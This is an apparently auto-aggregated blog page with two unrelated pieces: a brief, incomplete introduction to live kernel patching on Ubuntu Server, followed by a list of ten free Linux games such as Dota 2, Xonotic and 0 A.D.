Live patching kernel in Ubuntu Server to avoid rebooting

In case of a Linux kernel updates, you’ll have to restart the system after the update. This is an issue when you don’t want downtime for your server.

Live patching feature allows the patching of Linux kernel while the kernel is still running. In other words, you don’t have to reboot your system.

If you manage servers, you may want to enable live patching in Ubuntu.

Version upgrades are different

The updates discussed here is to keep your Ubuntu install fresh and updated. It doesn’t cover the version upgrades (for example upgrading Ubuntu 16.04 to 18.04).

Ubuntu version upgrades are entirely a different thing. It updates the entire operating system core. You need to make proper backups before starting this lengthy process.

Source

The 10 Best Free Linux Games

There are plenty of excellent games on Linux, and a fair amount of them are completely free. Some are open source, and others are fairly big names available through Steam. In every case, these are quality games that you can play any time on Linux at absolutely no cost.

DoTA 2

Dota 2 DoTA 2

is one of Valve’s biggest titles. It’s been around for a fairly long time, and it was one of the first games Valve ported to Linux when they started supporting the OS with Steam. It was also one of the first Linux games to receive Vulkan support.

DoTA 2 is one of the biggest MoBA games and a giant player in the eSports space. Valve continues to update DoTA 2 with new heroes and content. Because DoTA 2 is an eSports title with an active online playerbase, you’re never going to run out of things to do in this game.

Team Fortress 2

Team Fortress 2 Team Fortress 2 is another major title from Valve. It’s a cartoon first person shooter that allows you to take the role of one several characters with different abilities. Together with your team, you fight an opposing team over several objectives. Team Fortress 2 might not be as big as it once was, but it’s still a very popular title with complete Linux support. With an active online community and competitive play, this one shouldn’t get old for a long time.

Wakfu

Wakfu Wakfu is another excellent free game available on Steam. This is a classic anime-style turn based tactical RPG with a movement grid. Wakfu is actually a free to play MMORPG with an active and dedicated community.

If you’re a fan of classic JRPGs, or you’re just looking for something different, this one is a fantastic option. Because Wakfu is an MMO that’s still being actively supported, more content is always being added to the game, making it a great long term favorite.

Xonotic

Xonotic Xonotic is one of those games that goes back a long way with Linux gamers. It’s an open source sci-fi first person shooter with a fast paced gameplay feel that might remind you of a mix between Quake and Timesplitters.

Xonotic might not be a AAA blockbuster, but it’s still a fun game with online play. Because it’s open source, you might even find it in your distribution’s repositories. Even if it’s not, you still won’t have a problem downloading it and getting running real quick.

Battle For Wesnoth

Battle For Wesnoth Battle for Wesnoth is a turn based strategy game set in a medieval fantasy world. Wesnoth is open source, and it’s available in many distribution repositories as well as on Steam. This is another game that’s been synonymous with Linux gaming for a long time.

Wesnoth has a endearing old school vibe with pixel graphics, don’t let that trick you into thinking this is a dated game. Instead, it blends nostalgic visuals with genuinely fun and engaging gameplay to make one awesome free game.

0 A.D.

0 A.D.If real time strategy is more your thing, check out 0 A.D. It’s an open source real time strategy(RTS) game that’s probably available in your distribution’s repositories. 0 A.D. has been popular for a long time in the Linux world, and for good reason. It’s actually a great RTS game that can rival some commercial options.

0 A.D. is still under continual development, and receives regular updates. It features fully 3D gameplay and units with combat animations. Over the years, the graphics of 0 A.D. have improved dramatically, so it looks pretty great, especially for a free game.

SuperTuxKart

SuperTuxKartFor years, SuperTuxKart was a joke of sorts when talking about Linux gaming. Its an open source clone of the popular Mario Kart series, but featuring Tux instead of Nintendo’s trademark plumber. Still, the game is actually fun, free, and probably in your distribution’s repositories. SuperTuxKart is fully 3D and will run on nearly any Linux computer, regardless of your system specs, making it a great option for standard desktops as well as gaming PCs.

The Dark Mod

The Dark ModIf you like the classic game, Thief, check out The Dark Mod. First off, it’s not technically a mod, at least not anymore. It started out as a total conversion on top of Doom 3, but it’s since evolved into its own standalone game that you can download directly from the developer’s website.

The Dark Mode is a lot like Theif, with the player acting as a thief in a steampunk style world, but it isn’t set in the same world and doesn’t use any of the assets from Theif. This is it’s on game, a fan created tribute of sorts. That said, it’s still an actively developed title with regular updates, new content, and continual improvements. If you’re a fan of stealth gameplay at all, this one should be on your to-play list.

HedgeWars

HedgeWars HedgeWars is a modern remake of the classic game Worms, but with its own twists and improvements. Like Worms, HedgeWars is all about strategy and choosing the right tools for each situation. HedgeWars adds a more comedic style and multiplayer.

HedgeWars is opens source, cross platform, and of course, free to play. It’s under constant development with new tools, weapons, and customization options always popping up.

AwesomeNauts

AwesomeNauts AwesomeNauts is another free Steam game for Linux. This one isn’t from Valve. Instead, it’s one of the growing number of indie titles to support Linux on Steam. AwesomeNauts is a 2D side scrolling MoBA that feels like a strange cross between DoTA 2 and Mega Man. Somehow, that works in a really great way,

While serious MoBA fans might not like the side scrolling gameplay, if you’re looking for something that’s just pure chaotic fun, this one is definitely a great option.

Closing Thoughts

These games are a great example of how much the Linux gaming ecosystem is growing. With top quality free games continually adding to an already impressive library, gamers will find more options than ever to get into gaming on Linux.

Source

WP2Social Auto Publish Powered By : XYZScripts.com